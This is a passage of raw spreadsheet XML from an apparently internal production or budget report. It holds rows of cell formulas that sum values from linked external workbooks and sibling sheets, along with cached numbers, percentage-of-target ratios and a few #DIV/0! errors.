      </c>
      <c r="G11" s="194">
        <f>'[10]24'!$E$26+'[11]24'!$E$21+'[12]24'!$E$19+'[13]24'!$E$29+'[14]24'!$E$13+'[14]24'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'23'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]24'!$I$26+'[11]24'!$I$21+'[12]24'!$I$19+'[13]24'!$I$29+'[14]24'!$E$28+'[14]24'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'23'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]24'!$L$26+'[11]24'!$L$21+'[12]24'!$L$19+'[13]24'!$L$29+'[14]24'!$H$28+'[14]24'!$H$35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4546.55000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'23'!H12</f>
        <v>185633.28</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5128024.53</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>21393.66</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'23'!K12</f>
        <v>402596.69</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5431703.066</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>203472.475000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>46.3490831435195</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]24'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]24'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]24'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]24'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]24'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]24'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]24'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]24'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]24'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'23'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'23'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>37.3343990825781</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]24'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]24'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]24'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]24'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]24'!$U$68</f>
        <v>67.8767361111111</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]24'!$V$68</f>
        <v>71.3047020484171</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]24'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]24'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]24'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>603</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'23'!H14</f>
        <v>64119</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1028662.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6928.33</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'23'!K14</f>
        <v>127938.455</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1920882.561</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>55872.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]24'!$W$71</f>
        <v>245.25</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]24'!$X$71</f>
        <v>219.870528109029</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]24'!$Y$71</f>
        <v>213.933275462963</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]24'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]24'!$U$71</f>
        <v>50.9548611111111</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]24'!$V$71</f>
        <v>50.2793296089386</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]24'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]24'!$R$71</f>
        <v>293.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]24'!$S$71</f>
        <v>4320.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'23'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>246.33</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'23'!K15</f>
        <v>7551.705</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>122308.205</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]24'!$W$72</f>
        <v>59.8333333333333</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]24'!$X$72</f>
        <v>63.6798218214412</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]24'!$Y$72</f>
        <v>61.4830492238548</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]24'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]24'!$U$72</f>
        <v>63.9184027777778</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]24'!$V$72</f>
        <v>51.6372206703911</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]24'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]24'!$R$72</f>
        <v>368.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]24'!$S$72</f>
        <v>4436.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'23'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'23'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]24'!$W$73</f>
        <v>59.125</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]24'!$X$73</f>
        <v>61.3791636759976</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]24'!$Y$73</f>
        <v>62.7903302000271</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]24'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]24'!$U$73</f>
        <v>65.3072916666667</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]24'!$V$73</f>
        <v>53.2167132216015</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]24'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]24'!$R$73</f>
        <v>376.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]24'!$S$73</f>
        <v>4572.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'23'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'23'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]24'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]24'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]24'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]24'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]24'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]24'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]24'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]24'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]24'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'23'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'23'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]24'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]24'!$X$74</f>
        <v>217.185714285714</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]24'!$Y$74</f>
        <v>221.82678461222</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]24'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]24'!$U$74</f>
        <v>12.1527777777778</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]24'!$V$74</f>
        <v>7.35486499068901</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]24'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]24'!$R$74</f>
        <v>70</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]24'!$S$74</f>
        <v>631.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'23'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'23'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]24'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]24'!$X$72</f>
        <v>9.99999999999999e-6</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]24'!$Y$72</f>
        <v>9.15068493150685e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]24'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]24'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]24'!$V$72</f>
        <v>4.24813780260708e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]24'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]24'!$R$72</f>
        <v>2.4e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]24'!$S$72</f>
        <v>0.000365</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'23'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'23'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]24'!$W$73</f>
        <v>189.439575440018</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]24'!$X$73</f>
        <v>174.692966441656</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]24'!$Y$73</f>
        <v>238.051584410034</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]24'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]24'!$U$73</f>
        <v>19.7760458333333</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]24'!$V$73</f>
        <v>68.6177882332402</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]24'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]24'!$R$73</f>
        <v>113.910024</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]24'!$S$73</f>
        <v>5895.640365</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]24'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]24'!$E$22</f>
        <v>8252</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'23'!H21</f>
        <v>176694</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2286132</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]24'!$I$22</f>
        <v>8044.44</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'23'!K21</f>
        <v>193800.65</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2260254.65</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]24'!$L$22</f>
        <v>65946.66</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>140.312042553192</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]24'!$W$81</f>
        <v>280.207171314741</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]24'!$X$81</f>
        <v>279.285168149535</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]24'!$Y$81</f>
        <v>275.90604730818</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]24'!$T$81</f>
        <v>87.1527777777778</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]24'!$U$81</f>
        <v>33.5298032407407</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]24'!$V$81</f>
        <v>35.9508263500931</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]24'!$Q$81</f>
        <v>20.9166666666667</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]24'!$R$81</f>
        <v>193.131666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]24'!$S$81</f>
        <v>3088.895</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]24'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]24'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'23'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]24'!$I$17</f>
        <v>8316.33</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'23'!K22</f>
        <v>163455.88</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2054917.26</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]24'!$L$17</f>
        <v>89170.472</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>44.585236</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209" t="e">
        <f>'[13]24'!$W$79</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]24'!$X$79</f>
        <v>100.88175474065</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]24'!$Y$79</f>
        <v>102.163613275646</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]24'!$T$79</f>
        <v>0</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]24'!$U$79</f>
        <v>47.5167824074074</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]24'!$V$79</f>
        <v>45.5220618663356</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]24'!$Q$79</f>
        <v>0</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]24'!$R$79</f>
        <v>273.696666666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]24'!$S$79</f>
        <v>3911.25555555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]24'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]24'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'23'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]24'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'23'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]24'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209" t="e">
        <f>'[13]24'!$W$80</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]24'!$X$80</f>
        <v>84.0875838114989</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]24'!$Y$80</f>
        <v>79.4755154056492</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]24'!$T$80</f>
        <v>0</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]24'!$U$80</f>
        <v>34.1141493055556</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]24'!$V$80</f>
        <v>32.6042054624457</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]24'!$Q$80</f>
        <v>0</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]24'!$R$80</f>
        <v>196.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]24'!$S$80</f>
        <v>2801.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]24'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]24'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'23'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]24'!$I$56</f>
        <v>2217.33</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'23'!K24</f>
        <v>33564.1</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>313390.63</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]24'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]24'!$R$6</f>
        <v>80.8333333333333</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]24'!$S$6</f>
        <v>85.1714931197371</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]24'!$T$6</f>
        <v>86.0865538342797</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]24'!$O$6</f>
        <v>100</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]24'!$P$6</f>
        <v>59.171875</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]24'!$Q$6</f>
        <v>52.7787476722533</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]24'!$L$6</f>
        <v>24</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]24'!$M$6</f>
        <v>340.83</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]24'!$N$6</f>
        <v>4534.75</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]24'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'23'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]24'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'23'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]24'!$R$7</f>
        <v>179.625</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]24'!$S$7</f>
        <v>192.935708752905</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]24'!$T$7</f>
        <v>187.969843487146</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]24'!$O$7</f>
        <v>100</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]24'!$P$7</f>
        <v>56.0329861111111</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]24'!$Q$7</f>
        <v>50.5741387337058</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]24'!$L$7</f>
        <v>24</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]24'!$M$7</f>
        <v>322.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]24'!$N$7</f>
        <v>4345.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
